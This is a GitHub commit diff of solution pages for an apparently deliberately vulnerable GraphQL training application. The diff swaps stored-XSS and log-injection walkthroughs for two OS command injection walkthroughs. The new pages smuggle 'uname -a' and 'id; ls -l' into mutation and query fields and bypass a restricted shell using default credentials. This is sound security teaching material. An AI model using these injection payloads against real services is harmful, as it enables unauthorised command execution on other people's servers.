-
Notifications
You must be signed in to change notification settings - Fork 300
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
27 changed files
with
519 additions
and
400 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,32 +1,38 @@ | ||
<!-- Start --> | ||
<h3 style="color:purple" id="inj-xss"><b>Injection :: Stored Cross Site Scripting</b></h3> | ||
<h3 style="color:purple" id="exec-os-1"><b>Code Execution :: OS Command Injection #1</b></h3> | ||
<hr /> | ||
<h5>Problem Statement</h5> | ||
<p> | ||
The GraphQL mutations <code>createPaste</code> and <code>importPaste</code> allow creating and importing new pastes. The pastes may include any character without any restrictions. The pastes would then render in | ||
the Public and Private paste pages, which would result in a Cross Site Scripting vulnerability (XSS).</p> | ||
The mutation <code>importPaste</code> allows escaping from the parameters and introduce a UNIX command by chaining | ||
commands. The GraphQL resolver does not sufficiently validate the input, and passes it directly | ||
into <code>cURL</code>.</p> | ||
<h5>Resources</h5> | ||
<ul> | ||
<li> | ||
<a href="https://portswigger.net/web-security/cross-site-scripting/stored" target="_blank"> | ||
<i class="fa fa-newspaper"></i> PortSwigger - Stored Cross Site Scripting | ||
<a href="https://owasp.org/www-community/attacks/Command_Injection" target="_blank"> | ||
<i class="fa fa-newspaper"></i> OWASP - Command Injection | ||
</a> | ||
</li> | ||
</ul> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-inj-xss')">Show</button></h5> | ||
<div id="sol-inj-xss" style="display:none"> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-exec-os-1')">Show</button></h5> | ||
<div id="sol-exec-os-1" style="display:none"> | ||
<pre class="bash"> | ||
# Create New Paste allows special characters that would render in HTML. | ||
mutation { | ||
createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) { | ||
pasteId | ||
} | ||
} | ||
# Beginner mode | ||
|
||
# Alternatively, importing a paste that includes Javascript will also result in the same behaviour. | ||
mutation { | ||
importPaste(host:"localhost", port:80, path:"/xss.html"") | ||
} | ||
</pre> | ||
# Import Paste allows specifying UNIX characters to break out of the URL provided to importPaste, using characters such as ";" "&&", "||", and more. | ||
mutation { | ||
importPaste(host:'localhost', port:80, path:"/ ; uname -a", scheme:"http"){ | ||
result | ||
} | ||
} | ||
|
||
# Expert mode | ||
|
||
# Import Paste filters characters such as ";" and "&" but not "|", if you manage to cause the import to fail, you can double pipe it to a command that will execute in the context of the operating system. | ||
mutation { | ||
importPaste(host:"hostthatdoesnotexist.com", port:80, path:"/ || uname -a", scheme:"http") { | ||
result | ||
} | ||
}</pre> | ||
</div> | ||
<!-- End --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,36 +1,47 @@ | ||
<!-- Start --> | ||
<h3 style="color:purple" id="inj-log"><b>Injection :: Log Injection</b></h3> | ||
<h3 style="color:purple" id="exec-os-2"><b>Code Execution :: OS Command Injection #2</b></h3> | ||
<hr /> | ||
<h5>Problem Statement</h5> | ||
<p> | ||
GraphQL actions such as <code>mutation</code> and <code>query</code> have the ability to take an <code>operation name</code> as part of the query. | ||
Here is an example query that uses <code>MyName</code> as an operation name: | ||
<pre>query MyName { | ||
getMyName | ||
{ | ||
first | ||
last | ||
} | ||
} </pre></p> | ||
<p>The application is keeping track of all queries and mutations users are executing on this system in order to display them in the audit log.</p> | ||
<p>However, the application is not doing a fair job at verifying the operation name.</p> | ||
The query <code>systemDiagnostics</code> accepts certain UNIX binaries as parameters for debugging purposes, such as | ||
<code>whoami</code>, <code>ps</code>, etc. It acts as a restricted shell. However, it is protected | ||
with a username and password. After obtaining the <a href="http://127.0.0.1:5000/solutions#misc-weakpass">correct | ||
credentials</a>, the restricted shell seems to be bypassable by chaining commands together. | ||
</p> | ||
<h5>Resources</h5> | ||
<ul> | ||
<li> | ||
<a href="https://cwe.mitre.org/data/definitions/117.html" target= "_blank"> | ||
<i class="fa fa-newspaper"></i> CWE-117: Improper Output Neutralization for Logs | ||
<a href="https://www.netsparker.com/blog/web-security/command-injection-vulnerability/" target="_blank"> | ||
<i class="fa fa-newspaper"></i> Netsparker - Command Injection | ||
</a> | ||
</li> | ||
</ul> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-inj-log')">Show</button></h5> | ||
<div id="sol-inj-log" style="display:none"> | ||
<h5>Exploitation Solution <button class="reveal" onclick="reveal('sol-exec-os-2')">Show</button></h5> | ||
<div id="sol-exec-os-2" style="display:none"> | ||
<pre class="bash"> | ||
# Spoof the operation conducted to getPaste instead of createPaste | ||
mutation getPaste{ | ||
createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) { | ||
pasteId | ||
} | ||
} | ||
</pre> | ||
# System Diagnostics suffers from weak restricted shell implementation | ||
|
||
query { | ||
systemDiagnostics(username:"admin", password:"password", cmd:"id") | ||
} | ||
|
||
>>> Response: | ||
{ | ||
"data": { | ||
"systemDiagnostics": "id: command not found" | ||
} | ||
} | ||
|
||
|
||
query { | ||
systemDiagnostics(username:"admin", password:"password", cmd:"id; ls -l") | ||
} | ||
|
||
>>> Response: | ||
{ | ||
"data": { | ||
"systemDiagnostics": "total 128\ndrwxr-xr- .. COLORTERM=truecolor\n_=/usr/bin/env\n" | ||
} | ||
}</pre> | ||
</div> | ||
<!-- End --> |
Oops, something went wrong.